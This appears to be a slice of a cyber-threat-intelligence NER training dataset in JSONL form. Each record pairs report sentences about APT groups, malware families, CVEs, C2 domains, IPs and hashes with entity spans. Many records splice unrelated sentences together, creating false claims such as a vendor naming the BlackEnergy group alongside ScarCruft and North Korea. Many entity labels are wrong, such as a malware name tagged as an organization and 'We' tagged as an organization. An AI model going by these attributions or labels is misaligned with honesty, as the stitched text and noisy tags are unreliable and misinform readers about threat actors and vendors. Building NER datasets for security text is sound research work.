{"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": {"TOOL: PowerShell command": [[16, 34]], "TOOL: PupyRAT": [[103, 110]], "TOOL: research and penetration-testing tool": [[115, 152]]}, "info": {"id": "cyberner_stix_train_007063", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "ORGANIZATION: Trend Micro": [[246, 257]], "FILEPATH: espionage toolkit": [[307, 324]], "MALWARE: KeyBoy": [[405, 411]]}, "info": {"id": "cyberner_stix_train_007064", "source": "cyberner_stix_train"}}
{"text": "The key for the RC4 encryption in this sample is the hardcoded string “ h0le ” .", "spans": {}, "info": {"id": "cyberner_stix_train_007065", "source": "cyberner_stix_train"}}
{"text": "Quasar contains the NetSerializer library that handles serialization of high level IPacket objects that the client and server use to communicate .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: NetSerializer library": [[20, 41]], "TOOL: client and server": [[108, 125]]}, "info": {"id": "cyberner_stix_train_007066", "source": "cyberner_stix_train"}}
{"text": "Palo Alto Networks Traps Advanced Endpoint Protection recently prevented recent attacks that we believe are part of a campaign linked to DustySky .", "spans": {"ORGANIZATION: Palo Alto Networks Traps Advanced Endpoint Protection": [[0, 53]]}, "info": {"id": "cyberner_stix_train_007067", "source": "cyberner_stix_train"}}
{"text": "The malicious executables all called out to the same URLs on windowsnewupdates.com .", "spans": {"DOMAIN: windowsnewupdates.com": [[61, 82]]}, "info": {"id": "cyberner_stix_train_007068", "source": "cyberner_stix_train"}}
{"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": {"ORGANIZATION: Apple": [[205, 210]], "ORGANIZATION: Google": [[215, 221]], "THREAT_ACTOR: CIA": [[226, 229]], "ORGANIZATION: Anthem": [[355, 361]], "THREAT_ACTOR: to Deep Panda": [[382, 395]]}, "info": {"id": "cyberner_stix_train_007069", "source": "cyberner_stix_train"}}
{"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": {"MALWARE: Riltok": [[3, 9]], "ORGANIZATION: Kaspersky": [[144, 153]], "THREAT_ACTOR: SixLittleMonkeys": [[210, 226]], "TOOL: Microcin Trojan": [[258, 273]], "TOOL: RAT": [[280, 283]]}, "info": {"id": "cyberner_stix_train_007070", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"THREAT_ACTOR: attackers": [[68, 77]], "TOOL: MitM": [[159, 163]], "THREAT_ACTOR: APT28": [[211, 216]], "ORGANIZATION: Russia's Main Intelligence Directorate of the Russian General Staff": [[263, 330]], "ORGANIZATION: U.S. Department of Justice": [[346, 372]]}, "info": {"id": "cyberner_stix_train_007071", "source": "cyberner_stix_train"}}
{"text": "IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia .", "spans": {"ORGANIZATION: IBM": [[0, 3]], "MALWARE: Shamoon2": [[81, 89]]}, "info": {"id": "cyberner_stix_train_007072", "source": "cyberner_stix_train"}}
{"text": "Once the user double-clicks on the executable file , the dropper drops a Word document in %AppData% and displays the following decoy document to the victim , while the dropper runs in the background and installs the backdoor . %appdata%\\info.docx :", "spans": {"TOOL: Word": [[73, 77]], "FILEPATH: %appdata%\\info.docx": [[227, 246]]}, "info": {"id": "cyberner_stix_train_007073", "source": "cyberner_stix_train"}}
{"text": "Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace .", "spans": {"THREAT_ACTOR: Lazarus": [[54, 61]], "THREAT_ACTOR: Guardians of Peace": [[72, 90]]}, "info": {"id": "cyberner_stix_train_007074", "source": "cyberner_stix_train"}}
{"text": "While unlikely , it is worth considering that the same C&C server might have been the subject of 3rd-party attacks due to this vulnerability .", "spans": {"TOOL: C&C": [[55, 58]]}, "info": {"id": "cyberner_stix_train_007075", "source": "cyberner_stix_train"}}
{"text": "Malicious activity is trigged only on user interaction , attackers normally use this technique to bypass sandbox/automated analysis .", "spans": {}, "info": {"id": "cyberner_stix_train_007076", "source": "cyberner_stix_train"}}
{"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": {"TOOL: xlsm file": [[358, 367]], "MALWARE: it": [[370, 372]]}, "info": {"id": "cyberner_stix_train_007077", "source": "cyberner_stix_train"}}
{"text": "In the beginning of July 2015 , the Dukes embarked on yet another large-scale phishing campaign .", "spans": {"THREAT_ACTOR: Dukes": [[36, 41]]}, "info": {"id": "cyberner_stix_train_007078", "source": "cyberner_stix_train"}}
{"text": "On many occasions , both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine , using a debugger , or located within a sandbox .", "spans": {}, "info": {"id": "cyberner_stix_train_007079", "source": "cyberner_stix_train"}}
{"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course For simplicity , Kaspersky is calling them the BlackEnergy APT group . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {"ORGANIZATION: Kaspersky": [[446, 455]], "THREAT_ACTOR: ScarCruft": [[575, 584]]}, "info": {"id": "cyberner_stix_train_007080", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT uses custom batch scripts to collect either specific file types ( including files with .pptx , .xlsx , .pdf extensions ) or all files within a specific location .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "FILEPATH: .pptx": [[104, 109]], "FILEPATH: .xlsx": [[112, 117]], "FILEPATH: .pdf": [[120, 124]]}, "info": {"id": "cyberner_stix_train_007081", "source": "cyberner_stix_train"}}
{"text": "Analysis of those files uncovered two more imphashes , 0B4E44256788783634A2B1DADF4F9784 and E44F0BD2ADFB9CBCABCAD314D27ACCFC , for a total of 20 malicious files .", "spans": {"FILEPATH: 0B4E44256788783634A2B1DADF4F9784": [[55, 87]], "FILEPATH: E44F0BD2ADFB9CBCABCAD314D27ACCFC": [[92, 124]]}, "info": {"id": "cyberner_stix_train_007082", "source": "cyberner_stix_train"}}
{"text": "CTU researchers discovered the threat actors searching for \" [company] login , \" which directed them to the landing page for remote access .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_007083", "source": "cyberner_stix_train"}}
{"text": "What this means for you All Lookout customers are protected from this threat . The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries . The ZxShell mutex is created named @_ZXSHELL_@ . The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP ’s primary capabilities and contains many developer - supplied comments for the included code .", "spans": {"ORGANIZATION: Lookout": [[28, 35]], "THREAT_ACTOR: Axiom": [[83, 88]], "TOOL: ZxShell": [[239, 246]], "MALWARE: PIEHOP ’s": [[572, 581]]}, "info": {"id": "cyberner_stix_train_007084", "source": "cyberner_stix_train"}}
{"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": {"THREAT_ACTOR: Dropping Elephant": [[0, 17]], "THREAT_ACTOR: Chinastrats": [[36, 47]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: threat actor": [[90, 102]], "ORGANIZATION: diplomatic": [[147, 157]], "ORGANIZATION: economic": [[162, 170]], "TOOL: e-mail": [[425, 431]]}, "info": {"id": "cyberner_stix_train_007085", "source": "cyberner_stix_train"}}
{"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": {"TOOL: DROPSHOT": [[0, 8]], "TOOL: malware": [[31, 38]], "ORGANIZATION: media": [[179, 184]]}, "info": {"id": "cyberner_stix_train_007086", "source": "cyberner_stix_train"}}
{"text": "Each organization typically only saw a handful of employees at the receiving end of these emails .", "spans": {"TOOL: emails": [[90, 96]]}, "info": {"id": "cyberner_stix_train_007087", "source": "cyberner_stix_train"}}
{"text": "Interestingly , there appear to be two parallel efforts within the campaign , with each effort using a completely different toolset for the attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_007088", "source": "cyberner_stix_train"}}
{"text": "This mimics the wallet updater connected to the C2 addresses : wfcwallet.com ( resolved ip : 108.174.195.134 ) , www.chainfun365.com ( resolved ip : 23.254.217.53 ) .", "spans": {"TOOL: C2": [[48, 50]], "DOMAIN: wfcwallet.com": [[63, 76]], "IP_ADDRESS: 108.174.195.134": [[93, 108]], "DOMAIN: www.chainfun365.com": [[113, 132]], "IP_ADDRESS: 23.254.217.53": [[149, 162]]}, "info": {"id": "cyberner_stix_train_007089", "source": "cyberner_stix_train"}}
{"text": "After analyzing the traffic associated with these short links , we determined that each one was associated with a referral path from mail.mosa.pna.ps . With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers . When APT1 attackers are not using WEBC2 , they require a “ command and control ” ( C2 ) user interface so they can issue commands to the backdoor . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": {"TOOL: Icefog": [[206, 212]], "THREAT_ACTOR: APT1": [[295, 299]], "MALWARE: WEBC2": [[324, 329]], "TOOL: command and control": [[349, 368]], "TOOL: C2": [[373, 375]], "ORGANIZATION: Cisco Talos researchers": [[438, 461]], "TOOL: Greatness": [[482, 491]], "THREAT_ACTOR: phishing - as - a - service tools": [[519, 552]]}, "info": {"id": "cyberner_stix_train_007090", "source": "cyberner_stix_train"}}
{"text": "] info OpSec fails and use of cryptography While looking at this infrastructure , we identified that one of these domains has directory indexing enabled . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . However , they also include names referencing English-speaking countries , such as “ aunewsonline.com ” ( Australia ) , “ canadatvsite.com ” ( Canada ) , and “ todayusa.org ” ( U.S . ) . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"ORGANIZATION: Palo Alto": [[173, 182]], "DOMAIN: aunewsonline.com": [[508, 524]], "DOMAIN: canadatvsite.com": [[545, 561]], "DOMAIN: todayusa.org": [[583, 595]], "SYSTEM: Google Analytics API": [[648, 668]], "THREAT_ACTOR: a web skimmer": [[671, 684]]}, "info": {"id": "cyberner_stix_train_007091", "source": "cyberner_stix_train"}}
{"text": "] net , negg2.ddns [ . We found two malicious iOS applications in Operation Pawn Storm . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"ORGANIZATION: We": [[23, 25]], "THREAT_ACTOR: admin@338": [[93, 102]], "ORGANIZATION: financial": [[131, 140]], "ORGANIZATION: policy organizations": [[145, 165]], "TOOL: emails": [[205, 211]], "ORGANIZATION: audiences": [[254, 263]]}, "info": {"id": "cyberner_stix_train_007092", "source": "cyberner_stix_train"}}
{"text": "To protect against code injections and other attacks , system operators should routinely evaluate known and published vulnerabilities , periodically perform software updates and technology refreshes , and audit external-facing systems for known web application vulnerabilities .", "spans": {"TOOL: external-facing systems": [[211, 234]]}, "info": {"id": "cyberner_stix_train_007093", "source": "cyberner_stix_train"}}
{"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"ORGANIZATION: FireEye": [[6, 13], [142, 149], [305, 312]], "ORGANIZATION: BACKSWING": [[40, 49], [73, 82]], "MALWARE: BADRABBIT": [[61, 70]], "MALWARE: BADRABBIT dropper": [[198, 215]], "ORGANIZATION: Microsoft": [[241, 250]], "VULNERABILITY: CVE-2017-11882": [[270, 284]], "THREAT_ACTOR: attacker": [[325, 333]], "VULNERABILITY: exploit": [[343, 350]], "TOOL: Microsoft Office": [[359, 375]], "ORGANIZATION: government organization": [[402, 425]]}, "info": {"id": "cyberner_stix_train_007094", "source": "cyberner_stix_train"}}
{"text": "The beginning of 2011 however saw a significant break from that routine , when a large grouping of domain names was registered by the Dukes in two batches ; the first batch was registered on the 29th of January and the second on the 13th of February .", "spans": {"THREAT_ACTOR: Dukes": [[134, 139]]}, "info": {"id": "cyberner_stix_train_007095", "source": "cyberner_stix_train"}}
{"text": "It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab .", "spans": {}, "info": {"id": "cyberner_stix_train_007096", "source": "cyberner_stix_train"}}
{"text": "Some emulators build their phone number out of the default number created in the emulator software and the port number : 5554. getMachine function using anti-emulator technique . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": {"THREAT_ACTOR: AveMaria": [[179, 187]], "THREAT_ACTOR: FIN7": [[286, 290]], "ORGANIZATION: ministries of foreign affairs": [[301, 330]], "THREAT_ACTOR: Ke3chang": [[402, 410]]}, "info": {"id": "cyberner_stix_train_007097", "source": "cyberner_stix_train"}}
{"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . Unlike the Nov. 26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations . The contents of the Exchange Web Server ( also found within the folder ) • At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": {"SYSTEM: Android": [[23, 30]], "ORGANIZATION: Trend Micro": [[206, 217]], "MALWARE: espionage toolkit": [[267, 284]], "TOOL: KeyBoy": [[365, 371]], "SYSTEM: Exchange Web Server": [[514, 533]], "SYSTEM: Exchange Control Panel ( ECP ) logs": [[589, 624]], "SYSTEM: ECP Server logs": [[762, 777]]}, "info": {"id": "cyberner_stix_train_007098", "source": "cyberner_stix_train"}}
{"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European “ market. ” The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Talos has named this malware KONNI .", "spans": {"TOOL: PsExec tool": [[335, 346]], "ORGANIZATION: Talos": [[349, 354]], "MALWARE: KONNI": [[378, 383]]}, "info": {"id": "cyberner_stix_train_007099", "source": "cyberner_stix_train"}}
{"text": "At the time of writing this article , no other significant changes in Asacub ’ s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities . From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) . We also want to specifically thank Google ’s Threat Analysis Group ( TAG ) , Mandiant ’s DPRK Fusion Cell , and our government partners for their continued collaboration and support .", "spans": {"MALWARE: Asacub": [[70, 76], [132, 138], [173, 179]], "TOOL: Baidu search engine": [[261, 280]], "TOOL: virtual private server": [[414, 436]], "TOOL: VPS": [[439, 442]], "ORGANIZATION: Google ’s Threat Analysis Group ( TAG )": [[632, 671]], "ORGANIZATION: Mandiant ’s DPRK Fusion Cell": [[674, 702]]}, "info": {"id": "cyberner_stix_train_007100", "source": "cyberner_stix_train"}}
{"text": "Malware code showing definition of populateConfigMap Figure 14 . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . The other archiving tools were able to extract one file from the ZIP attachment – either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe . CADDYWIPER was then executed as a scheduled task at a predetermined time .", "spans": {"THREAT_ACTOR: group": [[84, 89]], "THREAT_ACTOR: Vixen Panda": [[94, 105]], "THREAT_ACTOR: Ke3chang": [[108, 116]], "THREAT_ACTOR: Royal APT": [[119, 128]], "THREAT_ACTOR: Playful Dragon": [[135, 149]], "FILEPATH: order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe": [[241, 288]], "MALWARE: CADDYWIPER": [[291, 301]]}, "info": {"id": "cyberner_stix_train_007101", "source": "cyberner_stix_train"}}
{"text": "The document loads malicious content from http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm via the settings.xml.rels component that is embedded within the DOCX document .", "spans": {"URL: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[42, 110]], "FILEPATH: settings.xml.rels": [[119, 136]], "TOOL: DOCX": [[175, 179]]}, "info": {"id": "cyberner_stix_train_007102", "source": "cyberner_stix_train"}}
{"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"SYSTEM: brother.apk": [[3, 14], [61, 72]], "SYSTEM: mcpef.apk": [[40, 49]], "TOOL: technical exploitation capabilities": [[116, 151]], "VULNERABILITY: zero-day exploits": [[218, 235]], "FILEPATH: Attachments": [[412, 423]]}, "info": {"id": "cyberner_stix_train_007103", "source": "cyberner_stix_train"}}
{"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain . The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report . As a result , we decided to call this variant FakeSG .", "spans": {"ORGANIZATION: TRAC": [[194, 198]], "THREAT_ACTOR: APT12": [[317, 322]], "ORGANIZATION: Mandiant": [[342, 350]], "ORGANIZATION: M-Trends": [[356, 364]]}, "info": {"id": "cyberner_stix_train_007104", "source": "cyberner_stix_train"}}
{"text": "Figure 7 – C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft ’s recent activity . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"MALWARE: Anubis": [[52, 58]], "SYSTEM: Android": [[104, 111]], "THREAT_ACTOR: Wild Neutron": [[191, 203]], "VULNERABILITY: Java zero-day exploit": [[234, 255]], "THREAT_ACTOR: ScarCruft": [[396, 405]], "MALWARE: SocGholish": [[506, 516]]}, "info": {"id": "cyberner_stix_train_007105", "source": "cyberner_stix_train"}}
{"text": "1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way . The attackers behind the breach of the New York Times ’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"TOOL: Vietnamese backdoor": [[305, 324]], "ORGANIZATION: New York Times": [[448, 462]], "ORGANIZATION: RussianPanda": [[587, 599]]}, "info": {"id": "cyberner_stix_train_007106", "source": "cyberner_stix_train"}}
{"text": "Additionally , one of the two government organizations had the highest infection rate of the Indian targets .", "spans": {}, "info": {"id": "cyberner_stix_train_007107", "source": "cyberner_stix_train"}}
{"text": "In our February report , we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities .", "spans": {"THREAT_ACTOR: Sofacy": [[43, 49]], "ORGANIZATION: Microsoft": [[62, 71]], "ORGANIZATION: Office": [[72, 78]], "MALWARE: SofacyCarberp": [[126, 139]]}, "info": {"id": "cyberner_stix_train_007108", "source": "cyberner_stix_train"}}
{"text": "For threat hunting , iDefense recommends searching for the following :", "spans": {}, "info": {"id": "cyberner_stix_train_007109", "source": "cyberner_stix_train"}}
{"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": {"ORGANIZATION: Antiy Lab": [[14, 23]], "THREAT_ACTOR: Green Spot": [[54, 64]], "VULNERABILITY: CVE-2017-1099": [[161, 174]], "TOOL: RTF": [[190, 193]]}, "info": {"id": "cyberner_stix_train_007110", "source": "cyberner_stix_train"}}
{"text": "In addition to the traffic originating from Chengdu , we identified a selection of hacktools and malware signed using nine stolen certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_007111", "source": "cyberner_stix_train"}}
{"text": "It abuses accessibility services . In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": {"THREAT_ACTOR: crime group": [[140, 151]], "MALWARE: Trojan": [[274, 280]], "MALWARE: ISMAgent backdoor": [[359, 376]]}, "info": {"id": "cyberner_stix_train_007112", "source": "cyberner_stix_train"}}
{"text": "Execute a command through exploits for CVE-2018-0802 . Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": {"VULNERABILITY: CVE-2018-0802": [[39, 52]], "ORGANIZATION: gaming": [[80, 86]], "ORGANIZATION: technology organizations": [[91, 115]]}, "info": {"id": "cyberner_stix_train_007113", "source": "cyberner_stix_train"}}
{"text": "In this scenario , the domain cdnverify.net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": {"TOOL: C2": [[152, 154]]}, "info": {"id": "cyberner_stix_train_007114", "source": "cyberner_stix_train"}}
{"text": "As mentioned by Kaspersky , even though the exploits used for these MiniDuke campaigns were near-identical to those described by FireEye , there were nevertheless small differences .", "spans": {"ORGANIZATION: Kaspersky": [[16, 25]], "MALWARE: MiniDuke": [[68, 76]], "ORGANIZATION: FireEye": [[129, 136]]}, "info": {"id": "cyberner_stix_train_007115", "source": "cyberner_stix_train"}}
{"text": "This threat group attacked defense contractors and aerospace companies . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: defense contractors": [[27, 46]], "ORGANIZATION: aerospace companies": [[51, 70]], "FILEPATH: China Chopper": [[73, 86]], "TOOL: Virtual Terminal": [[113, 129]]}, "info": {"id": "cyberner_stix_train_007116", "source": "cyberner_stix_train"}}
{"text": "Thanks to this tool reuse , we found the threat group uploading a credential dumping tool called Dumpert that we had not seen used in prior incidents involving the exploitation of CVE-2019-0604 .", "spans": {"TOOL: Dumpert": [[97, 104]], "VULNERABILITY: CVE-2019-0604": [[180, 193]]}, "info": {"id": "cyberner_stix_train_007117", "source": "cyberner_stix_train"}}
{"text": "The Word document usually exploits CVE-2012-0158 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": {"MALWARE: Word document": [[4, 17]], "VULNERABILITY: CVE-2012-0158": [[35, 48]], "TOOL: SMBv1": [[73, 78]], "VULNERABILITY: exploit": [[79, 86]], "THREAT_ACTOR: Shadow Brokers": [[130, 144]]}, "info": {"id": "cyberner_stix_train_007118", "source": "cyberner_stix_train"}}
{"text": "According to the document.xml file , the DealersChoice loader SWF exists after the “ covert-shores-small.png ” image file within the delivery document .", "spans": {"FILEPATH: document.xml": [[17, 29]], "TOOL: DealersChoice": [[41, 54]], "TOOL: SWF": [[62, 65]], "FILEPATH: covert-shores-small.png": [[85, 108]]}, "info": {"id": "cyberner_stix_train_007119", "source": "cyberner_stix_train"}}
{"text": "RECEIVE_SMS - Allows the application to receive SMS messages . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": {"ORGANIZATION: FireEye": [[73, 80]], "MALWARE: VALUEVAULT": [[152, 162]], "MALWARE: LONGWATCH": [[167, 176]], "THREAT_ACTOR: attackers": [[208, 217]], "THREAT_ACTOR: Gorgon Group": [[265, 277]]}, "info": {"id": "cyberner_stix_train_007120", "source": "cyberner_stix_train"}}
{"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 . The last retrieved module is a persistence module . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": {"THREAT_ACTOR: ScarCruft": [[153, 162]], "THREAT_ACTOR: Lesser - known threat actors": [[351, 379]], "MALWARE: DarkSide": [[448, 456]]}, "info": {"id": "cyberner_stix_train_007121", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-wqe [ . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government . Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"THREAT_ACTOR: APT28": [[91, 96]], "ORGANIZATION: Bulgaria": [[407, 415]], "ORGANIZATION: China": [[418, 423]], "ORGANIZATION: Vietnam": [[426, 433]]}, "info": {"id": "cyberner_stix_train_007122", "source": "cyberner_stix_train"}}
{"text": "TEMP.Veles ’ lateral movement activities used a publicly-available PowerShell based tool , WMImplant .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[0, 10]], "TOOL: PowerShell": [[67, 77]], "TOOL: WMImplant": [[91, 100]]}, "info": {"id": "cyberner_stix_train_007123", "source": "cyberner_stix_train"}}
{"text": "Once again this downloader is as straightforward as the Zebrocy gang ’s other downloaders .", "spans": {"MALWARE: Zebrocy": [[56, 63]]}, "info": {"id": "cyberner_stix_train_007124", "source": "cyberner_stix_train"}}
{"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": {"SYSTEM: TikTok": [[35, 41]], "MALWARE: Xagent": [[118, 124]], "MALWARE: Xagent.exe": [[150, 160]], "MALWARE: worm": [[200, 204]]}, "info": {"id": "cyberner_stix_train_007125", "source": "cyberner_stix_train"}}
{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"MALWARE: sample": [[146, 152]], "VULNERABILITY: CVE-2017-11882": [[172, 186], [271, 285]], "VULNERABILITY: CVE-2018-0802": [[190, 203]], "MALWARE: Microsoft Office Equation Editor": [[288, 320]]}, "info": {"id": "cyberner_stix_train_007126", "source": "cyberner_stix_train"}}
